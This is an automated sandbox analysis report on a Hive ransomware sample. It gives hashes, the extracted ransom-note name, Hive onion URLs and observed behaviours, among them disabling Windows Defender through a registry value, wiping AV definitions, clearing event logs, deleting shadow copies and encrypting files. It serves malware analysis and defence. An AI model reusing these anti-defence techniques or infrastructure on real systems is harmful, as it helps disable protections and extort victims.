Analysis
-
max time kernel
236s -
max time network
128s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 16:48
Static task
static1
Behavioral task
behavioral1
Sample
ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe
Resource
win7-en-20211208
General
-
Target
ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe
-
Size
2.7MB
-
MD5
4e24407deffd0a8b899961ea1c9222b8
-
SHA1
5e38a984cad2c7538b86bed6f8fec15491b6b8c3
-
SHA256
ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef
-
SHA512
3482a3f81f6a2d4e106df1adcaab2ccef553e0ae944ecfe02ceed2165e9b6ecef8519124c23c8d2eae5a5d301d7d5b4013c88d443b89ad108757ba583391355b
Malware Config
Extracted
C:\rtZ9_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2788 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\RequestRename.tif.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_pwqU9DCUbt40.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Users\Admin\Pictures\BlockExport.crw.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_jA0CasY4qwE0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File renamed C:\Users\Admin\Pictures\CheckpointFind.raw => C:\Users\Admin\Pictures\CheckpointFind.raw.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_uTBSMQewiWk0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File renamed C:\Users\Admin\Pictures\CompressStep.raw => C:\Users\Admin\Pictures\CompressStep.raw.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_Ogm99aeHdMU0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File renamed C:\Users\Admin\Pictures\DisconnectAssert.tif => C:\Users\Admin\Pictures\DisconnectAssert.tif.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_NBezSEWsjtQ0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Users\Admin\Pictures\DisconnectAssert.tif.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_NBezSEWsjtQ0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File renamed C:\Users\Admin\Pictures\RequestRename.tif => C:\Users\Admin\Pictures\RequestRename.tif.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_pwqU9DCUbt40.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File renamed C:\Users\Admin\Pictures\BlockExport.crw => C:\Users\Admin\Pictures\BlockExport.crw.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_jA0CasY4qwE0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Users\Admin\Pictures\CheckpointFind.raw.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_uTBSMQewiWk0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Users\Admin\Pictures\CompressStep.raw.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_Ogm99aeHdMU0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exedescription ioc process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Grace-ul-oob.xrm-ms.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_o8B0ae9T3Q00.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\BOLDSTRI.ELM.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_fGd2gMXIAKk0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-black\MedTile.scale-125.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Edit.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-black\SmallLogo.scale-150_contrast-black.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\ui-strings.js.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_EWlQNQroBm40.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\ar\rtZ9_HOW_TO_DECRYPT.txt ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_lbt69iqdGaw0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\Group.scale-180.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-GoogleCloudCache-Light.scale-100.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_14mYjW7TQuA0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\id\msipc.dll.mui.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_zrsnk8MNWn80.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATER\WATER.ELM.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_Xs4oSRuKaJ00.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\BadgeLogo1.targetsize-54.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rtZ9_HOW_TO_DECRYPT.txt ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.EXCEL.16.1033.hxn.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_3Zr4OFKAa8s0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Square150x150Logo.scale-100.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-64.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-40.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\rtZ9_HOW_TO_DECRYPT.txt ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-200_contrast-high.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\TextureBitmaps\pitissue.jpg ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_m-odGUePpzk0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\CHANGELOG.md ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\FlickLearningWizard.exe.mui ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashSquareTile.scale-125.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8080_20x20x32.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\Logo.scale-150.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-default_32.svg.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_4LMcAibsjeU0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_patterns_header.png.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_u3JoQYk2w-Y0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\rtZ9_HOW_TO_DECRYPT.txt ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipschs.xml ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_mdYA42ZAqJs0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\Sybase.xsl.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_wy7UvY93FP40.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\placeholder.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_cW0v-vDd77E0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockWideTile.scale-125.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\collection_grey.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_DJ-Efcpf0JM0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\movie.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\mooning.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\WideTile.scale-200.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\rtZ9_HOW_TO_DECRYPT.txt ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_NauBMFWQ3dA0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\WinStore.winmd ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-24_altform-unplated.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pl.jar.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_e4wDte20X240.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_12d.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosStoreLogo.contrast-white.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_BGWQRAcnY-I0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\index_poster.jpg.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_rzIvnpMoyuw0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_yk5Bdfi60rc0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\rtZ9_HOW_TO_DECRYPT.txt ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_j7pq3SjDmRM0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W3.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\jm_16x11.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_2016.719.1035.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-GoogleCloudCache-Dark.scale-140.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_es_135x40.svg.BFccN_GoLuZpoToSYnkTpqF1A_hhas9h0MJGbh6LyMz_4E4UgOyxYsg0.xetvm ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\DarkBlue.png ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2196 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2256 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exeec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exepid process 3264 powershell.exe 3264 powershell.exe 3264 powershell.exe 1652 powershell.exe 1652 powershell.exe 1652 powershell.exe 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 2836 wevtutil.exe Token: SeBackupPrivilege 2836 wevtutil.exe Token: SeSecurityPrivilege 3924 wevtutil.exe Token: SeBackupPrivilege 3924 wevtutil.exe Token: SeSecurityPrivilege 916 wevtutil.exe Token: SeBackupPrivilege 916 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1264 wmic.exe Token: SeSecurityPrivilege 1264 wmic.exe Token: SeTakeOwnershipPrivilege 1264 wmic.exe Token: SeLoadDriverPrivilege 1264 wmic.exe Token: SeSystemProfilePrivilege 1264 wmic.exe Token: SeSystemtimePrivilege 1264 wmic.exe Token: SeProfSingleProcessPrivilege 1264 wmic.exe Token: SeIncBasePriorityPrivilege 1264 wmic.exe Token: SeCreatePagefilePrivilege 1264 wmic.exe Token: SeBackupPrivilege 1264 wmic.exe Token: SeRestorePrivilege 1264 wmic.exe Token: SeShutdownPrivilege 1264 wmic.exe Token: SeDebugPrivilege 1264 wmic.exe Token: SeSystemEnvironmentPrivilege 1264 wmic.exe Token: SeRemoteShutdownPrivilege 1264 wmic.exe Token: SeUndockPrivilege 1264 wmic.exe Token: SeManageVolumePrivilege 1264 wmic.exe Token: 33 1264 wmic.exe Token: 34 1264 wmic.exe Token: 35 1264 wmic.exe Token: 36 1264 wmic.exe Token: SeIncreaseQuotaPrivilege 3048 wmic.exe Token: SeSecurityPrivilege 3048 wmic.exe Token: SeTakeOwnershipPrivilege 3048 wmic.exe Token: SeLoadDriverPrivilege 3048 wmic.exe Token: SeSystemProfilePrivilege 3048 wmic.exe Token: SeSystemtimePrivilege 3048 wmic.exe Token: SeProfSingleProcessPrivilege 3048 wmic.exe Token: SeIncBasePriorityPrivilege 3048 wmic.exe Token: SeCreatePagefilePrivilege 3048 wmic.exe Token: SeBackupPrivilege 3048 wmic.exe Token: SeRestorePrivilege 3048 wmic.exe Token: SeShutdownPrivilege 3048 wmic.exe Token: SeDebugPrivilege 3048 wmic.exe Token: SeSystemEnvironmentPrivilege 3048 wmic.exe Token: SeRemoteShutdownPrivilege 3048 wmic.exe Token: SeUndockPrivilege 3048 wmic.exe Token: SeManageVolumePrivilege 3048 wmic.exe Token: 33 3048 wmic.exe Token: 34 3048 wmic.exe Token: 35 3048 wmic.exe Token: 36 3048 wmic.exe Token: SeIncreaseQuotaPrivilege 3048 wmic.exe Token: SeSecurityPrivilege 3048 wmic.exe Token: SeTakeOwnershipPrivilege 3048 wmic.exe Token: SeLoadDriverPrivilege 3048 wmic.exe Token: SeSystemProfilePrivilege 3048 wmic.exe Token: SeSystemtimePrivilege 3048 wmic.exe Token: SeProfSingleProcessPrivilege 3048 wmic.exe Token: SeIncBasePriorityPrivilege 3048 wmic.exe Token: SeCreatePagefilePrivilege 3048 wmic.exe Token: SeBackupPrivilege 3048 wmic.exe Token: SeRestorePrivilege 3048 wmic.exe Token: SeShutdownPrivilege 3048 wmic.exe Token: SeDebugPrivilege 3048 wmic.exe Token: SeSystemEnvironmentPrivilege 3048 wmic.exe Token: SeRemoteShutdownPrivilege 3048 wmic.exe Token: SeUndockPrivilege 3048 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2440 wrote to memory of 1808 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 1808 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 1808 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 1808 wrote to memory of 3924 1808 net.exe net1.exe PID 1808 wrote to memory of 3924 1808 net.exe net1.exe PID 1808 wrote to memory of 3924 1808 net.exe net1.exe PID 2440 wrote to memory of 1160 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 1160 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 1160 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 1160 wrote to memory of 864 